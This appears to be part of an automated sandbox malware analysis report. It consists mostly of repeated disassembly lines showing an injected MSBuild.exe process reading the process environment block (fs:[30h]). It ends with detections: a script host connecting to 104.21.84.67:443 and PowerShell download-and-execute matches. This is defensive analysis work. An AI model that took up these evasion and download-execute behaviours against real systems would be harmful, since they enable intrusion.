Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FED34C mov eax, dword ptr fs:[00000030h] 10_2_00FED34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010792BC mov eax, dword ptr fs:[00000030h] 10_2_010792BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010792BC mov eax, dword ptr fs:[00000030h] 10_2_010792BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010792BC mov ecx, dword ptr fs:[00000030h] 10_2_010792BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010792BC mov ecx, dword ptr fs:[00000030h] 10_2_010792BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0101B2C0 mov eax, dword ptr fs:[00000030h] 10_2_0101B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0101B2C0 mov eax, dword ptr fs:[00000030h] 10_2_0101B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0101B2C0 mov eax, dword ptr fs:[00000030h] 10_2_0101B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0101B2C0 mov eax, dword ptr fs:[00000030h] 10_2_0101B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0101B2C0 mov eax, dword ptr fs:[00000030h] 10_2_0101B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0101B2C0 mov eax, dword ptr fs:[00000030h] 10_2_0101B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0101B2C0 mov eax, dword ptr fs:[00000030h] 10_2_0101B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FE7330 mov eax, dword ptr fs:[00000030h] 10_2_00FE7330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0101F2D0 mov eax, dword ptr fs:[00000030h] 10_2_0101F2D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0101F2D0 mov eax, dword ptr fs:[00000030h] 10_2_0101F2D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010002E1 mov eax, dword ptr fs:[00000030h] 10_2_010002E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010002E1 mov eax, dword ptr fs:[00000030h] 10_2_010002E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010002E1 mov eax, dword ptr fs:[00000030h] 10_2_010002E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010A12ED mov eax, dword ptr fs:[00000030h] 10_2_010A12ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010A12ED mov eax, dword ptr fs:[00000030h] 10_2_010A12ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010A12ED mov eax, dword ptr fs:[00000030h] 10_2_010A12ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010A12ED mov eax, dword ptr fs:[00000030h] 10_2_010A12ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010A12ED mov eax, dword ptr fs:[00000030h] 10_2_010A12ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010A12ED mov eax, dword ptr fs:[00000030h] 10_2_010A12ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010A12ED mov eax, dword ptr fs:[00000030h] 10_2_010A12ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010A12ED mov eax, dword ptr fs:[00000030h] 10_2_010A12ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010A12ED mov eax, dword ptr fs:[00000030h] 10_2_010A12ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010A12ED mov eax, dword ptr fs:[00000030h] 10_2_010A12ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010A12ED mov eax, dword ptr fs:[00000030h] 10_2_010A12ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010A12ED mov eax, dword ptr fs:[00000030h] 10_2_010A12ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010A12ED mov eax, dword ptr fs:[00000030h] 10_2_010A12ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010A12ED mov eax, dword ptr fs:[00000030h] 10_2_010A12ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FEC310 mov ecx, dword ptr fs:[00000030h] 10_2_00FEC310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010C52E2 mov eax, dword ptr fs:[00000030h] 10_2_010C52E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010AF2F8 mov eax, dword ptr fs:[00000030h] 10_2_010AF2F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01027505 mov eax, dword ptr fs:[00000030h] 10_2_01027505
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01027505 mov ecx, dword ptr fs:[00000030h] 10_2_01027505
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01086500 mov eax, dword ptr fs:[00000030h] 10_2_01086500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010C4500 mov eax, dword ptr fs:[00000030h] 10_2_010C4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010C4500 mov eax, dword ptr fs:[00000030h] 10_2_010C4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010C4500 mov eax, dword ptr fs:[00000030h] 10_2_010C4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010C4500 mov eax, dword ptr fs:[00000030h] 10_2_010C4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010C4500 mov eax, dword ptr fs:[00000030h] 10_2_010C4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010C4500 mov eax, dword ptr fs:[00000030h] 10_2_010C4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010C4500 mov eax, dword ptr fs:[00000030h] 10_2_010C4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FF04E5 mov ecx, dword ptr fs:[00000030h] 10_2_00FF04E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010AB52F mov eax, dword ptr fs:[00000030h] 10_2_010AB52F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0109F525 mov eax, dword ptr fs:[00000030h] 10_2_0109F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0109F525 mov eax, dword ptr fs:[00000030h] 10_2_0109F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0109F525 mov eax, dword ptr fs:[00000030h] 10_2_0109F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0109F525 mov eax, dword ptr fs:[00000030h] 10_2_0109F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0109F525 mov eax, dword ptr fs:[00000030h] 10_2_0109F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0109F525 mov eax, dword ptr fs:[00000030h] 10_2_0109F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0109F525 mov eax, dword ptr fs:[00000030h] 10_2_0109F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0102D530 mov eax, dword ptr fs:[00000030h] 10_2_0102D530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0102D530 mov eax, dword ptr fs:[00000030h] 10_2_0102D530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01000535 mov eax, dword ptr fs:[00000030h] 10_2_01000535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01000535 mov eax, dword ptr fs:[00000030h] 10_2_01000535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01000535 mov eax, dword ptr fs:[00000030h] 10_2_01000535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01000535 mov eax, dword ptr fs:[00000030h] 10_2_01000535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01000535 mov eax, dword ptr fs:[00000030h] 10_2_01000535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01000535 mov eax, dword ptr fs:[00000030h] 10_2_01000535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010C5537 mov eax, dword ptr fs:[00000030h] 10_2_010C5537
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0101E53E mov eax, dword ptr fs:[00000030h] 10_2_0101E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0101E53E mov eax, dword ptr fs:[00000030h] 10_2_0101E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0101E53E mov eax, dword ptr fs:[00000030h] 10_2_0101E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0101E53E mov eax, dword ptr fs:[00000030h] 10_2_0101E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0101E53E mov eax, dword ptr fs:[00000030h] 10_2_0101E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FF64AB mov eax, dword ptr fs:[00000030h] 10_2_00FF64AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0102656A mov eax, dword ptr fs:[00000030h] 10_2_0102656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0102656A mov eax, dword ptr fs:[00000030h] 10_2_0102656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0102656A mov eax, dword ptr fs:[00000030h] 10_2_0102656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0102B570 mov eax, dword ptr fs:[00000030h] 10_2_0102B570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0102B570 mov eax, dword ptr fs:[00000030h] 10_2_0102B570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FF9486 mov eax, dword ptr fs:[00000030h] 10_2_00FF9486
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FF9486 mov eax, dword ptr fs:[00000030h] 10_2_00FF9486
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FEB480 mov eax, dword ptr fs:[00000030h] 10_2_00FEB480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01024588 mov eax, dword ptr fs:[00000030h] 10_2_01024588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0107B594 mov eax, dword ptr fs:[00000030h] 10_2_0107B594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0107B594 mov eax, dword ptr fs:[00000030h] 10_2_0107B594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0102E59C mov eax, dword ptr fs:[00000030h] 10_2_0102E59C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FF1460 mov eax, dword ptr fs:[00000030h] 10_2_00FF1460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FF1460 mov eax, dword ptr fs:[00000030h] 10_2_00FF1460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FF1460 mov eax, dword ptr fs:[00000030h] 10_2_00FF1460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FF1460 mov eax, dword ptr fs:[00000030h] 10_2_00FF1460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FF1460 mov eax, dword ptr fs:[00000030h] 10_2_00FF1460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010705A7 mov eax, dword ptr fs:[00000030h] 10_2_010705A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010705A7 mov eax, dword ptr fs:[00000030h] 10_2_010705A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010705A7 mov eax, dword ptr fs:[00000030h] 10_2_010705A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FE645D mov eax, dword ptr fs:[00000030h] 10_2_00FE645D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010115A9 mov eax, dword ptr fs:[00000030h] 10_2_010115A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010115A9 mov eax, dword ptr fs:[00000030h] 10_2_010115A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010115A9 mov eax, dword ptr fs:[00000030h] 10_2_010115A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010115A9 mov eax, dword ptr fs:[00000030h] 10_2_010115A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010115A9 mov eax, dword ptr fs:[00000030h] 10_2_010115A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010145B1 mov eax, dword ptr fs:[00000030h] 10_2_010145B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010145B1 mov eax, dword ptr fs:[00000030h] 10_2_010145B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0101F5B0 mov eax, dword ptr fs:[00000030h] 10_2_0101F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0101F5B0 mov eax, dword ptr fs:[00000030h] 10_2_0101F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0101F5B0 mov eax, dword ptr fs:[00000030h] 10_2_0101F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0101F5B0 mov eax, dword ptr fs:[00000030h] 10_2_0101F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0101F5B0 mov eax, dword ptr fs:[00000030h] 10_2_0101F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0101F5B0 mov eax, dword ptr fs:[00000030h] 10_2_0101F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0101F5B0 mov eax, dword ptr fs:[00000030h] 10_2_0101F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0101F5B0 mov eax, dword ptr fs:[00000030h] 10_2_0101F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0101F5B0 mov eax, dword ptr fs:[00000030h] 10_2_0101F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010835BA mov eax, dword ptr fs:[00000030h] 10_2_010835BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010835BA mov eax, dword ptr fs:[00000030h] 10_2_010835BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010835BA mov eax, dword ptr fs:[00000030h] 10_2_010835BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010835BA mov eax, dword ptr fs:[00000030h] 10_2_010835BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010AF5BE mov eax, dword ptr fs:[00000030h] 10_2_010AF5BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0108D5B0 mov eax, dword ptr fs:[00000030h] 10_2_0108D5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0108D5B0 mov eax, dword ptr fs:[00000030h] 10_2_0108D5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FFB440 mov eax, dword ptr fs:[00000030h] 10_2_00FFB440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FFB440 mov eax, dword ptr fs:[00000030h] 10_2_00FFB440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FFB440 mov eax, dword ptr fs:[00000030h] 10_2_00FFB440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FFB440 mov eax, dword ptr fs:[00000030h] 10_2_00FFB440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FFB440 mov eax, dword ptr fs:[00000030h] 10_2_00FFB440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FFB440 mov eax, dword ptr fs:[00000030h] 10_2_00FFB440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010255C0 mov eax, dword ptr fs:[00000030h] 10_2_010255C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010C55C9 mov eax, dword ptr fs:[00000030h] 10_2_010C55C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0102E5CF mov eax, dword ptr fs:[00000030h] 10_2_0102E5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0102E5CF mov eax, dword ptr fs:[00000030h] 10_2_0102E5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0102A5D0 mov eax, dword ptr fs:[00000030h] 10_2_0102A5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0102A5D0 mov eax, dword ptr fs:[00000030h] 10_2_0102A5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0106D5D0 mov eax, dword ptr fs:[00000030h] 10_2_0106D5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0106D5D0 mov ecx, dword ptr fs:[00000030h] 10_2_0106D5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FEC427 mov eax, dword ptr fs:[00000030h] 10_2_00FEC427
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010C35D7 mov eax, dword ptr fs:[00000030h] 10_2_010C35D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010C35D7 mov eax, dword ptr fs:[00000030h] 10_2_010C35D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010C35D7 mov eax, dword ptr fs:[00000030h] 10_2_010C35D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010195DA mov eax, dword ptr fs:[00000030h] 10_2_010195DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FEE420 mov eax, dword ptr fs:[00000030h] 10_2_00FEE420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FEE420 mov eax, dword ptr fs:[00000030h] 10_2_00FEE420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FEE420 mov eax, dword ptr fs:[00000030h] 10_2_00FEE420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0101E5E7 mov eax, dword ptr fs:[00000030h] 10_2_0101E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0101E5E7 mov eax, dword ptr fs:[00000030h] 10_2_0101E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0101E5E7 mov eax, dword ptr fs:[00000030h] 10_2_0101E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0101E5E7 mov eax, dword ptr fs:[00000030h] 10_2_0101E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0101E5E7 mov eax, dword ptr fs:[00000030h] 10_2_0101E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0101E5E7 mov eax, dword ptr fs:[00000030h] 10_2_0101E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0101E5E7 mov eax, dword ptr fs:[00000030h] 10_2_0101E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0101E5E7 mov eax, dword ptr fs:[00000030h] 10_2_0101E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0102C5ED mov eax, dword ptr fs:[00000030h] 10_2_0102C5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0102C5ED mov eax, dword ptr fs:[00000030h] 10_2_0102C5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010115F4 mov eax, dword ptr fs:[00000030h] 10_2_010115F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010115F4 mov eax, dword ptr fs:[00000030h] 10_2_010115F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010115F4 mov eax, dword ptr fs:[00000030h] 10_2_010115F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010115F4 mov eax, dword ptr fs:[00000030h] 10_2_010115F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010115F4 mov eax, dword ptr fs:[00000030h] 10_2_010115F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010115F4 mov eax, dword ptr fs:[00000030h] 10_2_010115F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01028402 mov eax, dword ptr fs:[00000030h] 10_2_01028402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01028402 mov eax, dword ptr fs:[00000030h] 10_2_01028402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01028402 mov eax, dword ptr fs:[00000030h] 10_2_01028402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0101340D mov eax, dword ptr fs:[00000030h] 10_2_0101340D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01077410 mov eax, dword ptr fs:[00000030h] 10_2_01077410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FF25E0 mov eax, dword ptr fs:[00000030h] 10_2_00FF25E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01076420 mov eax, dword ptr fs:[00000030h] 10_2_01076420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01076420 mov eax, dword ptr fs:[00000030h] 10_2_01076420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01076420 mov eax, dword ptr fs:[00000030h] 10_2_01076420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01076420 mov eax, dword ptr fs:[00000030h] 10_2_01076420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01076420 mov eax, dword ptr fs:[00000030h] 10_2_01076420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01076420 mov eax, dword ptr fs:[00000030h] 10_2_01076420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01076420 mov eax, dword ptr fs:[00000030h] 10_2_01076420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_00FF65D0 mov eax, dword ptr fs:[00000030h] 10_2_00FF65D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0102A430 mov eax, dword ptr fs:[00000030h] 10_2_0102A430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0102E443 mov eax, dword ptr fs:[00000030h] 10_2_0102E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0102E443 mov eax, dword ptr fs:[00000030h] 10_2_0102E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0102E443 mov eax, dword ptr fs:[00000030h] 10_2_0102E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0102E443 mov eax, dword ptr fs:[00000030h] 10_2_0102E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0102E443 mov eax, dword ptr fs:[00000030h] 10_2_0102E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0102E443 mov eax, dword ptr fs:[00000030h] 10_2_0102E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0102E443 mov eax, dword ptr fs:[00000030h] 10_2_0102E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0102E443 mov eax, dword ptr fs:[00000030h] 10_2_0102E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010AF453 mov eax, dword ptr fs:[00000030h] 10_2_010AF453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0101245A mov eax, dword ptr fs:[00000030h] 10_2_0101245A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0100F460 mov eax, dword ptr fs:[00000030h] 10_2_0100F460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0100F460 mov eax, dword ptr fs:[00000030h] 10_2_0100F460

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exe Network Connect: 104.21.84.67 443 Jump to behavior
Yara detected Powershell download and execute
Source: Yara match File source: amsi64_5804.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: powershell.exe PID: 2616, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5804, type: MEMORYSTR
